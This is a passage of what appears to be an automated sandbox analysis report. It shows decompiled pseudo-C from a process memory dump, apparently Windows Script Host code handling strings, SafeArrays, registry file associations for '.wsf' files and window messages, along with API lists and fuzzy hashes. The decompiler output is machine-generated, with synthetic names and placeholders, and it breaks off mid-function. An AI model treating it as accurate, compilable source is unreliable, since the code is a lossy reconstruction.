                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$ErrorFreeInfo$AllocCreateLoad
                                                        • String ID:
                                                        • API String ID: 3761032807-0
                                                        • Opcode ID: 7546fe3262956aafe84d9ef921f7b5182a2559cf10595973e1a595c2c2e57c42
                                                        • Instruction ID: 1bce28f3b411df608674ef4481037731f8bb505b926e5766b2fcf8d63f791a82
                                                        • Opcode Fuzzy Hash: 7546fe3262956aafe84d9ef921f7b5182a2559cf10595973e1a595c2c2e57c42
                                                        • Instruction Fuzzy Hash: 9841FD75D00119AFCB11FFA8C8488AEF7F9FF987107254AE5E815E7220E6319E41DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 92%
                                                        			E00B8EFA7(signed int* __ecx, WCHAR* _a4) {
                                                        				intOrPtr _t36;
                                                        				int _t37;
                                                        				signed int _t39;
                                                        				signed int _t42;
                                                        				signed int _t44;
                                                        				signed int _t45;
                                                        				signed int _t46;
                                                        				signed int _t49;
                                                        				signed int _t66;
                                                        				signed int _t68;
                                                        				signed int _t72;
                                                        				signed int* _t73;
                                                        				void* _t76;
                                                        
                                                        				_t73 = __ecx;
                                                        				_t36 =  *((intOrPtr*)(__ecx + 8));
                                                        				_t76 =  *(__ecx + 4) - _t36;
                                                        				if(_t76 != 0) {
                                                        					L9:
                                                        					_t37 = lstrlenW(_a4);
                                                        					_t71 = _t37 + 1;
                                                        					_t66 = 2;
                                                        					_t39 = (_t37 + 1) * _t66;
                                                        					_push( ~(0 | __eflags > 0x00000000) | _t39);
                                                        					L00B82877();
                                                        					_t49 = _t39;
                                                        					__eflags = _t49;
                                                        					if(_t49 != 0) {
                                                        						E00B831BD(_t49, _t71, _a4);
                                                        						 *( *_t73 + _t73[1] * 4) = _t49;
                                                        						_t73[1] = _t73[1] + 1;
                                                        						_t42 = 0;
                                                        						__eflags = 0;
                                                        					} else {
                                                        						_t42 = 0x8007000e;
                                                        					}
                                                        					return _t42;
                                                        				}
                                                        				_t68 = 4;
                                                        				_t44 = (_t36 + 0xa) * _t68;
                                                        				_push( ~(0 | _t76 > 0x00000000) | _t44);
                                                        				L00B82877();
                                                        				_t72 = _t44;
                                                        				if(_t72 != 0) {
                                                        					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + 0xa;
                                                        					_t45 = 0;
                                                        					__eflags =  *(__ecx + 4);
                                                        					if( *(__ecx + 4) <= 0) {
                                                        						L5:
                                                        						_t46 = _t73[1];
                                                        						while(1) {
                                                        							__eflags = _t46 - _t73[2];
                                                        							if(__eflags >= 0) {
                                                        								break;
                                                        							}
                                                        							 *(_t72 + _t46 * 4) =  *(_t72 + _t46 * 4) & 0x00000000;
                                                        							_t46 = _t46 + 1;
                                                        							__eflags = _t46;
                                                        						}
                                                        						_push( *_t73);
                                                        						L00B82082();
                                                        						 *_t73 = _t72;
                                                        						goto L9;
                                                        					} else {
                                                        						goto L4;
                                                        					}
                                                        					do {
                                                        						L4:
                                                        						 *((intOrPtr*)(_t72 + _t45 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + _t45 * 4));
                                                        						_t45 = _t45 + 1;
                                                        						__eflags = _t45 -  *(__ecx + 4);
                                                        					} while (_t45 <  *(__ecx + 4));
                                                        					goto L5;
                                                        				}
                                                        				return 0x8007000e;
                                                        			}

















                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8EFCA
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B8F007
                                                        • lstrlenW.KERNEL32(?,80000003,80000001,?,?,00B87AC8,00000000,00B83C8C,80000001,?,?), ref: 00B8F013
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8F02D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ??2@$??3@lstrlen
                                                        • String ID:
                                                        • API String ID: 78001279-0
                                                        • Opcode ID: be3603ce97ca058ccec84cdbb50fc9977071712c6b7fa858f70127497ce89c77
                                                        • Instruction ID: 771f67ef6f7f91fdf80f878005926a61d61ca62f538f7d6b5ed70d1cc244c0d7
                                                        • Opcode Fuzzy Hash: be3603ce97ca058ccec84cdbb50fc9977071712c6b7fa858f70127497ce89c77
                                                        • Instruction Fuzzy Hash: 9021D572200642AFD724AF28D845A36B7E4EF85765720887DF697CB6B1DA72E841CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00B83A91(void* __edx, intOrPtr* _a4, int _a8) {
                                                        				signed int _v8;
                                                        				char _v2056;
                                                        				short _v6152;
                                                        				int _v6156;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t16;
                                                        				int _t20;
                                                        				int _t24;
                                                        				WCHAR* _t25;
                                                        				void* _t30;
                                                        				void* _t33;
                                                        				intOrPtr* _t34;
                                                        				signed int _t35;
                                                        				intOrPtr _t36;
                                                        
                                                        				_t30 = __edx;
                                                        				E00B8321E(0x1808);
                                                        				_t16 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t16 ^ _t35;
                                                        				_t34 = _a4;
                                                        				 *_t34 = 0;
                                                        				_v6156 = 0;
                                                        				_t36 =  *0xb97001; // 0x0
                                                        				if(_t36 == 0) {
                                                        					if(LoadStringA( *0xb97020, _a8,  &_v2056, 0x800) == 0) {
                                                        						goto L4;
                                                        					} else {
                                                        						_t24 = MultiByteToWideChar(0, 0,  &_v2056, 0xffffffff,  &_v6152, 0x800);
                                                        						goto L2;
                                                        					}
                                                        				} else {
                                                        					_t24 = LoadStringW( *0xb97020, _a8,  &_v6152, 0x800);
                                                        					L2:
                                                        					_v6156 = _t24;
                                                        					if(_t24 == 0) {
                                                        						L4:
                                                        						_t20 = _v6156;
                                                        					} else {
                                                        						_t25 =  &_v6152;
                                                        						__imp__#2(_t25);
                                                        						 *_t34 = _t25;
                                                        						if(_t25 == 0) {
                                                        							_t20 = 0;
                                                        						} else {
                                                        							goto L4;
                                                        						}
                                                        					}
                                                        				}
                                                        				_pop(_t33);
                                                        				return E00B81335(_t20, 0, _v8 ^ _t35, _t30, _t33, _t34);
                                                        			}




















                                                        APIs
                                                        • LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                        • SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        • LoadStringA.USER32 ref: 00B8951A
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,00000000,?,00B887C6,?,?,?,?), ref: 00B8953B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$Load$AllocByteCharMultiWide
                                                        • String ID:
                                                        • API String ID: 1944948655-0
                                                        • Opcode ID: a5d321e337d34d50731613ceb6920a7345afc15659acc3c93706a5c35079e677
                                                        • Instruction ID: a887ac67a945517046c5533e5313ac7d1b4f2b8b57886eca4e30bcd4d57b8888
                                                        • Opcode Fuzzy Hash: a5d321e337d34d50731613ceb6920a7345afc15659acc3c93706a5c35079e677
                                                        • Instruction Fuzzy Hash: 00114CB694021CAFDB51AF64DD849EABBFCEB0D711B1484AAB545D7160DE309F88CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00B92FB7
                                                        • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00B92FE8
                                                          • Part of subcall function 00B93A92: SysStringLen.OLEAUT32(?), ref: 00B93AA2
                                                          • Part of subcall function 00B93A92: SysStringLen.OLEAUT32(?), ref: 00B93AA9
                                                        • VariantClear.OLEAUT32(?), ref: 00B93007
                                                        • VariantClear.OLEAUT32(?), ref: 00B9302E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$ClearString$ArrayElementInitSafe
                                                        • String ID:
                                                        • API String ID: 598207039-0
                                                        • Opcode ID: a88e103b9fd359d2996e62a1276e0b6b124c0eeea92211ea98b1a5c5824caed9
                                                        • Instruction ID: 9b907791002e51b91f717a196be934e78e24a7c7fee23c3c947a129aa9c2d50b
                                                        • Opcode Fuzzy Hash: a88e103b9fd359d2996e62a1276e0b6b124c0eeea92211ea98b1a5c5824caed9
                                                        • Instruction Fuzzy Hash: E411F876900109ABCF11DBA8C989ADEBBF9FF88751F1144A5EA15E3210EB30DE45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 33%
                                                        			E00B93DEC(intOrPtr* __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				void* _t18;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t23;
                                                        				intOrPtr* _t24;
                                                        
                                                        				_t10 = __eax;
                                                        				_push(0x18);
                                                        				L00B82877();
                                                        				if(__eax == 0) {
                                                        					_t24 = 0;
                                                        				} else {
                                                        					_t10 = E00B93DCF(__eax);
                                                        					_t24 = _t10;
                                                        				}
                                                        				if(_t24 != 0) {
                                                        					_t1 = _t24 + 0xc; // 0xc
                                                        					_t19 = _t1;
                                                        					__imp__#20(_a4, 1, _t19, _t18);
                                                        					_t23 = _t10;
                                                        					if(_t23 >= 0) {
                                                        						_t3 = _t24 + 0x10; // 0x10
                                                        						_t14 = _t3;
                                                        						__imp__#19(_a4, 1, _t14);
                                                        						_t23 = _t14;
                                                        						if(_t23 >= 0) {
                                                        							 *((intOrPtr*)(_t24 + 8)) =  *_t19;
                                                        							_t6 = _t24 + 0x14; // 0x14
                                                        							_t16 = _t6;
                                                        							__imp__#27(_a4, _t16);
                                                        							_t23 = _t16;
                                                        							if(_t23 >= 0) {
                                                        								 *_a8 = _t24;
                                                        								_t24 = 0;
                                                        								_t23 = 0;
                                                        							}
                                                        						}
                                                        					}
                                                        					if(_t24 != 0) {
                                                        						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                        					}
                                                        					goto L11;
                                                        				} else {
                                                        					_t23 = 0x8007000e;
                                                        					L11:
                                                        					return _t23;
                                                        				}
                                                        			}










                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B93DF5
                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,0000000C), ref: 00B93E21
                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,00000010), ref: 00B93E36
                                                        • SafeArrayCopy.OLEAUT32(?,00000014), ref: 00B93E4E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArraySafe$Bound$??2@Copy
                                                        • String ID:
                                                        • API String ID: 1857560380-0
                                                        • Opcode ID: b5052215adcd07e01ec5f16e0b4b89b8657d3db38098342bd6072f591dc2b9bc
                                                        • Instruction ID: 42bb51721958be623f9830ee83ad39ff6a46d6d3e27c5f4cb258cf0025266f17
                                                        • Opcode Fuzzy Hash: b5052215adcd07e01ec5f16e0b4b89b8657d3db38098342bd6072f591dc2b9bc
                                                        • Instruction Fuzzy Hash: 0F11C236100A19ABCB229F59C884A5A7BE9EFC4F60B114875F805CB220DB30DD41C7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 82%
                                                        			E00B8171F(intOrPtr _a4, void* _a8, intOrPtr _a12, signed int* _a16) {
                                                        				intOrPtr _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr _t26;
                                                        				signed int _t27;
                                                        				intOrPtr _t40;
                                                        				intOrPtr _t41;
                                                        				intOrPtr _t44;
                                                        
                                                        				 *_a16 =  *_a16 & 0x00000000;
                                                        				if(_a8 != 0) {
                                                        					return 0x8002000b;
                                                        				}
                                                        				_t40 = _a4;
                                                        				_t44 =  *((intOrPtr*)(_t40 + 0x14));
                                                        				EnterCriticalSection(0xb97034);
                                                        				if( *(_t44 + 0x1c) == 0) {
                                                        					_t22 =  *((intOrPtr*)(_t40 + 0x14));
                                                        					__imp__#162( *((intOrPtr*)(_t22 + 0x10)),  *(_t22 + 0x18) & 0x0000ffff, 0, _a12,  &_a8);
                                                        					_a4 = _t22;
                                                        					if(_t22 >= 0) {
                                                        						_t41 = E00B83F8A(_t40, _a8);
                                                        						_t24 = _a8;
                                                        						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                        						if(_t41 < 0) {
                                                        							L3:
                                                        							LeaveCriticalSection(0xb97034);
                                                        							_t26 = _t41;
                                                        							L4:
                                                        							return _t26;
                                                        						}
                                                        						goto L2;
                                                        					}
                                                        					LeaveCriticalSection(0xb97034);
                                                        					_t26 = _a4;
                                                        					goto L4;
                                                        				}
                                                        				L2:
                                                        				_t27 =  *(_t44 + 0x1c);
                                                        				 *((intOrPtr*)( *_t27 + 4))(_t27);
                                                        				 *_a16 =  *(_t44 + 0x1c);
                                                        				_t41 = 0;
                                                        				goto L3;
                                                        			}











                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(00B97034,?,?,?,?,00B81716,?,?,?,?), ref: 00B81743
                                                        • LeaveCriticalSection.KERNEL32(00B97034,?,?,?,?,00B81716,?,?,?,?), ref: 00B81767
                                                        • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,00000000), ref: 00B89A81
                                                        • LeaveCriticalSection.KERNEL32(00B97034,?,?,?,?,00B81716,?,?,?,?), ref: 00B89A8F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterLoadType
                                                        • String ID:
                                                        • API String ID: 2204791303-0
                                                        • Opcode ID: 713a065b1488affed7e8d6ee983268449d33b64ffadf7de73eec2b5d57cb497a
                                                        • Instruction ID: 3d817762e8b9d9f2387825b79252d740ad29dc36f7131cffcfbb8c91a6ddb393
                                                        • Opcode Fuzzy Hash: 713a065b1488affed7e8d6ee983268449d33b64ffadf7de73eec2b5d57cb497a
                                                        • Instruction Fuzzy Hash: 44114979200205EFCB149F28DC88A6A77F9FB84351F108859F80A8B261DB30ED42CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00B91586(void* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                        				signed int _v8;
                                                        				short _v72;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t14;
                                                        				signed int _t18;
                                                        				signed int _t20;
                                                        				short* _t21;
                                                        				WCHAR* _t25;
                                                        				void* _t26;
                                                        				short _t30;
                                                        				void* _t33;
                                                        				intOrPtr* _t34;
                                                        				intOrPtr _t35;
                                                        				signed int _t36;
                                                        
                                                        				_t28 = __ebx;
                                                        				_t14 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t14 ^ _t36;
                                                        				_t35 = _a4;
                                                        				_t34 = _a8;
                                                        				if(_t34 != 0) {
                                                        					_t18 =  *( *((intOrPtr*)(_t35 + 0x40)) + 0xe) & 0x0000ffff;
                                                        					L00B93EE8();
                                                        					_t20 = lstrlenW( &_v72);
                                                        					_t21 = _t18 + _t20 * 2;
                                                        					_t30 = 0x2e;
                                                        					 *_t21 = _t30;
                                                        					L00B93EE8();
                                                        					_t25 =  &_v72;
                                                        					__imp__#2( *( *((intOrPtr*)(_t35 + 0x40)) + 0xc) & 0x0000ffff, _t21 + 2, 0xa, _t18,  &_v72, 0xa, __ebx);
                                                        					 *_t34 = _t25;
                                                        					_t28 = _t25;
                                                        					if(_t25 != 0) {
                                                        						_t26 = 0;
                                                        					} else {
                                                        						_t26 = 0x8007000e;
                                                        					}
                                                        				} else {
                                                        					_t26 = 0x80004003;
                                                        				}
                                                        				return E00B81335(_t26, _t28, _v8 ^ _t36, _t33, _t34, _t35);
                                                        			}



















                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _itow$AllocStringlstrlen
                                                        • String ID:
                                                        • API String ID: 2661956110-0
                                                        • Opcode ID: 008e5ef6f6fd4d0ffa06017892a97e48eb14df564ba4eb912857962c324f4cfe
                                                        • Instruction ID: 9e0c31b070a0bab8bfc3c6e55adafc3f0e6ecddec92e327f3142f54c78c9f371
                                                        • Opcode Fuzzy Hash: 008e5ef6f6fd4d0ffa06017892a97e48eb14df564ba4eb912857962c324f4cfe
                                                        • Instruction Fuzzy Hash: 9911A172A00209ABCB00DFADD845AAEB3FCEB49710B110466F945EB250EB75EE01C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 37%
                                                        			E00B85DFD(intOrPtr* __ecx) {
                                                        				intOrPtr* _t21;
                                                        				intOrPtr* _t22;
                                                        				signed int _t29;
                                                        				intOrPtr* _t34;
                                                        				intOrPtr* _t35;
                                                        				intOrPtr* _t40;
                                                        				intOrPtr* _t45;
                                                        				intOrPtr* _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t51;
                                                        
                                                        				_t37 = __ecx;
                                                        				_t50 = __ecx;
                                                        				_t34 = __ecx + 0xc;
                                                        				 *__ecx = 0xb81e68;
                                                        				 *((intOrPtr*)(__ecx + 4)) = 0xb82274;
                                                        				 *((intOrPtr*)(__ecx + 8)) = 0xb82264;
                                                        				 *_t34 = 0xb81ebc;
                                                        				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
                                                        					__imp__#16(__eax);
                                                        				}
                                                        				_t21 =  *((intOrPtr*)(_t50 + 0x2c));
                                                        				if(_t21 != 0) {
                                                        					 *((intOrPtr*)( *_t21 + 8))(_t21);
                                                        				}
                                                        				_t22 =  *((intOrPtr*)(_t50 + 0x30));
                                                        				if(_t22 != 0) {
                                                        					 *((intOrPtr*)( *_t22 + 8))(_t22);
                                                        				}
                                                        				_t45 = __imp__#6;
                                                        				 *_t45( *((intOrPtr*)(_t50 + 0x40)));
                                                        				 *_t45( *((intOrPtr*)(_t50 + 0x44)));
                                                        				 *_t45( *((intOrPtr*)(_t50 + 0x3c)));
                                                        				_t46 = _t50 + 0x34;
                                                        				while( *_t46 != 0) {
                                                        					 *_t46 =  *((intOrPtr*)( *_t46 + 4));
                                                        					E00B92E38( *_t46);
                                                        				}
                                                        				_pop(_t44);
                                                        				_pop(_t50);
                                                        				_t37 = _t34;
                                                        				_pop(_t34);
                                                        				_push(_t34);
                                                        				_t35 = _t37;
                                                        				_push(_t50);
                                                        				_t51 =  *((intOrPtr*)(_t35 + 0x14));
                                                        				 *_t35 = 0xb814ec;
                                                        				if( *((char*)(_t35 + 0x18)) != 0) {
                                                        					_push(_t44);
                                                        					EnterCriticalSection(0xb97034);
                                                        					_t29 =  *(_t51 + 0x1c);
                                                        					if(_t29 != 0) {
                                                        						 *((intOrPtr*)( *_t29 + 8))(_t29);
                                                        					}
                                                        					 *(_t51 + 0x1c) =  *(_t51 + 0x1c) & 0x00000000;
                                                        					LeaveCriticalSection(0xb97034);
                                                        				}
                                                        				_t40 = _t35;
                                                        				 *_t40 = 0xb81518;
                                                        				return InterlockedDecrement(0xb97030);
                                                        			}














                                                        APIs
                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 00B85E29
                                                        • SysFreeString.OLEAUT32(?), ref: 00B85E52
                                                        • SysFreeString.OLEAUT32(?), ref: 00B85E57
                                                        • SysFreeString.OLEAUT32(?), ref: 00B85E5C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FreeString$ArrayDestroySafe
                                                        • String ID:
                                                        • API String ID: 4164600000-0
                                                        • Opcode ID: a4fc3f0c8513f56c146f10abfea46bc584a43a94cd7c753486a0b4997bc0db99
                                                        • Instruction ID: 39d94420518f418aa5568587d4bcb1a6a5cb6bcfb8437fb3da2d8236a8deb3d1
                                                        • Opcode Fuzzy Hash: a4fc3f0c8513f56c146f10abfea46bc584a43a94cd7c753486a0b4997bc0db99
                                                        • Instruction Fuzzy Hash: CC110976201B06DFCB24AF65D988916BBE9FF88311714499CE456D7620CB71E942CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B8FC81(struct HWND__* _a4, intOrPtr* _a8) {
                                                        				struct HWND__* _t11;
                                                        				struct HWND__* _t13;
                                                        
                                                        				_t11 = _a4;
                                                        				if(IsWindowVisible(_t11) != 0) {
                                                        					_t13 = _t11;
                                                        					if(_t11 == 0) {
                                                        						L4:
                                                        						PostMessageA(_t11, 0x10, 0, 0);
                                                        						PostMessageA(_t11, 0x100, 0xd, 0);
                                                        						 *_a8 =  *_a8 + 1;
                                                        					} else {
                                                        						while(E00B8FBD9(_t13) == 0) {
                                                        							_t13 = GetParent(_t13);
                                                        							if(_t13 != 0) {
                                                        								continue;
                                                        							} else {
                                                        								goto L4;
                                                        							}
                                                        							goto L5;
                                                        						}
                                                        					}
                                                        					L5:
                                                        				}
                                                        				return 1;
                                                        			}






                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00B8FC8B
                                                        • GetParent.USER32(?), ref: 00B8FCA7
                                                        • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00B8FCC0
                                                        • PostMessageA.USER32(?,00000100,0000000D,00000000), ref: 00B8FCCC
                                                          • Part of subcall function 00B8FBD9: GetClassNameA.USER32(?,?,00000005), ref: 00B8FBF5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: MessagePost$ClassNameParentVisibleWindow
                                                        • String ID:
                                                        • API String ID: 1155528767-0
                                                        • Opcode ID: c5d0c99d273243eca93232bf8b7a800e90711a3d6577cf71657ddeab7ebc014b
                                                        • Instruction ID: 91a6c7fc5985c19698be93892ad5c007285f0f780ea11693711b51659ac8a9dd
                                                        • Opcode Fuzzy Hash: c5d0c99d273243eca93232bf8b7a800e90711a3d6577cf71657ddeab7ebc014b
                                                        • Instruction Fuzzy Hash: FBF0B43264161A37D7227A189C01FBA37ACDB85B60F050062FD00F71A0CBA0A902CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B8F764(void* _a4, void* _a8, char* _a12, char* _a16) {
                                                        				int _t16;
                                                        				int _t19;
                                                        
                                                        				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20006,  &_a8);
                                                        				if(_t16 == 0) {
                                                        					_t16 = RegSetValueExA(_a8, _a12, _t16, 1, _a16, lstrlenA(_a16) + 1);
                                                        					RegCloseKey(_a8);
                                                        					_t19 = _t16;
                                                        				}
                                                        				if(_t19 > 0) {
                                                        					_t16 = _t16 & 0x0000ffff | 0x80070000;
                                                        				}
                                                        				return _t16;
                                                        			}





                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(?,00B8FB79,00000000,00020006,00B8FB79), ref: 00B8F77B
                                                        • lstrlenA.KERNEL32(?,?,00B8F9CB,00000000,Shell,00B89B44,00B8FBBC,?,?,00B8FB79,WSFFile,00000000), ref: 00B8F78A
                                                        • RegSetValueExA.ADVAPI32(00B8FB79,?,00000000,00000001,?,00000001), ref: 00B8F79E
                                                        • RegCloseKey.ADVAPI32(00B8FB79), ref: 00B8F7A9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpenValuelstrlen
                                                        • String ID:
                                                        • API String ID: 2964171075-0
                                                        • Opcode ID: 037c0f4d67c9b63fc2d4696e95b8952d0cbf28f65b4430f733d28f4075ff5604
                                                        • Instruction ID: 03607b1713a92f5f2afa10446b612bae8a08b9ae2b833f331a878e34ef04e001
                                                        • Opcode Fuzzy Hash: 037c0f4d67c9b63fc2d4696e95b8952d0cbf28f65b4430f733d28f4075ff5604
                                                        • Instruction Fuzzy Hash: 40F01D37941129BBDF221F94EC04BAA3B6AEF047A1F018520FE15EA170CA728D21DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 71%
                                                        			E00B83C66(intOrPtr* __ecx, char __edx, intOrPtr __edi) {
                                                        				signed int _v8;
                                                        				char _v528;
                                                        				signed int _v532;
                                                        				void* __ebx;
                                                        				void* __esi;
                                                        				signed int _t23;
                                                        				intOrPtr* _t30;
                                                        				intOrPtr* _t45;
                                                        				short* _t49;
                                                        				intOrPtr* _t55;
                                                        				intOrPtr* _t57;
                                                        				intOrPtr _t59;
                                                        				intOrPtr _t62;
                                                        				long _t66;
                                                        				intOrPtr* _t67;
                                                        				signed int _t68;
                                                        				void* _t69;
                                                        				void* _t71;
                                                        
                                                        				_t64 = __edi;
                                                        				_t58 = __edx;
                                                        				_t23 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t23 ^ _t68;
                                                        				_t67 = __ecx;
                                                        				_t49 = __ecx + 0x1c;
                                                        				 *_t49 = 0;
                                                        				if(E00B83752(__ecx) < 0) {
                                                        					L7:
                                                        					return E00B81335(_t26, _t49, _v8 ^ _t68, _t58, _t64, _t67);
                                                        				}
                                                        				if( *((intOrPtr*)(_t67 + 0x224)) == 0) {
                                                        					_t26 = 0;
                                                        					goto L7;
                                                        				}
                                                        				_push(__edi);
                                                        				if(lstrlenW( *( *(_t67 + 0x228))) >= 0x104) {
                                                        					_push(_t49);
                                                        					_push(0xcef);
                                                        					L20:
                                                        					_t59 =  *0xb9702c; // 0x0
                                                        					_t30 =  *0xb97010; // 0x0
                                                        					_t58 = _t59 + 0x15;
                                                        					__eflags = _t58;
                                                        					 *((intOrPtr*)( *_t30 + 0x10))(_t30, _t58);
                                                        					L21:
                                                        					_t26 = 0x8004ffff;
                                                        					L6:
                                                        					_pop(_t64);
                                                        					goto L7;
                                                        				}
                                                        				E00B831BD(_t49, 0x104,  *( *(_t67 + 0x228)));
                                                        				_t71 = _t69 + 0xc;
                                                        				if(E00B83D0D(_t49, 0x2e) == 0 || E00B82753(_t34 + 2, ?str?, 0xffffffff) != 0) {
                                                        					L5:
                                                        					_t26 = 0;
                                                        					goto L6;
                                                        				} else {
                                                        					E00B831BD( &_v528, 0x104, _t49);
                                                        					_t69 = _t71 + 0xc;
                                                        					_t66 = E00B8F1E9(_t67, _t58, __eflags,  &_v528);
                                                        					__eflags = _t66;
                                                        					if(_t66 >= 0) {
                                                        						__eflags = _t66 - 1;
                                                        						if(_t66 != 1) {
                                                        							goto L5;
                                                        						}
                                                        						__eflags =  *((char*)(_t67 + 6));
                                                        						if( *((char*)(_t67 + 6)) != 0) {
                                                        							_t55 =  *0xb97010; // 0x0
                                                        							 *((intOrPtr*)( *_t55 + 8))();
                                                        						}
                                                        						_push( &_v528);
                                                        						_push(0xd48);
                                                        						goto L20;
                                                        					}
                                                        					__eflags =  *((char*)(_t67 + 6));
                                                        					if( *((char*)(_t67 + 6)) != 0) {
                                                        						_t57 =  *0xb97010; // 0x0
                                                        						 *((intOrPtr*)( *_t57 + 8))();
                                                        					}
                                                        					__eflags = _t66 - 0x80070002;
                                                        					if(_t66 != 0x80070002) {
                                                        						_v532 = _v532 & 0x00000000;
                                                        						E00B8F3F0(_t66,  &_v532);
                                                        						_t45 =  *0xb97010; // 0x0
                                                        						_t62 =  *0xb9702c; // 0x0
                                                        						_t58 = _t62 + 0x14;
                                                        						 *((intOrPtr*)( *_t45 + 0x10))(_t45, _t62 + 0x14, 0xc84,  &_v528, _v532);
                                                        						__imp__#6(_v532);
                                                        						goto L21;
                                                        					} else {
                                                        						_push( &_v528);
                                                        						_push(0xcee);
                                                        						goto L20;
                                                        					}
                                                        				}
                                                        			}





















                                                        APIs
                                                        • lstrlenW.KERNEL32(?,80000001,00B8220C,00000000), ref: 00B83CA6
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,00000000,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B8276A
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B82771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: WSH
                                                        • API String ID: 1659193697-2133009938
                                                        • Opcode ID: c38fd98a3358486a0de6e8ba5b006f6500678a9e7452cb25ab9a0268dfe53e72
                                                        • Instruction ID: f8a49be186f7fd86163b409fc8b1efcf24c62bc4e56e1cbe1447406d756114f5
                                                        • Opcode Fuzzy Hash: c38fd98a3358486a0de6e8ba5b006f6500678a9e7452cb25ab9a0268dfe53e72
                                                        • Instruction Fuzzy Hash: 6B41B1B1544204ABDB20EB64CC89FAA77F9EF84B04F2049EAE41597271DE70DE45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B841AC(short* __ecx, void* __eflags, intOrPtr _a4, int _a8) {
                                                        				signed int _v8;
                                                        				char _v2084;
                                                        				void* _v2088;
                                                        				intOrPtr _v2092;
                                                        				short* _v2096;
                                                        				void* __ebx;
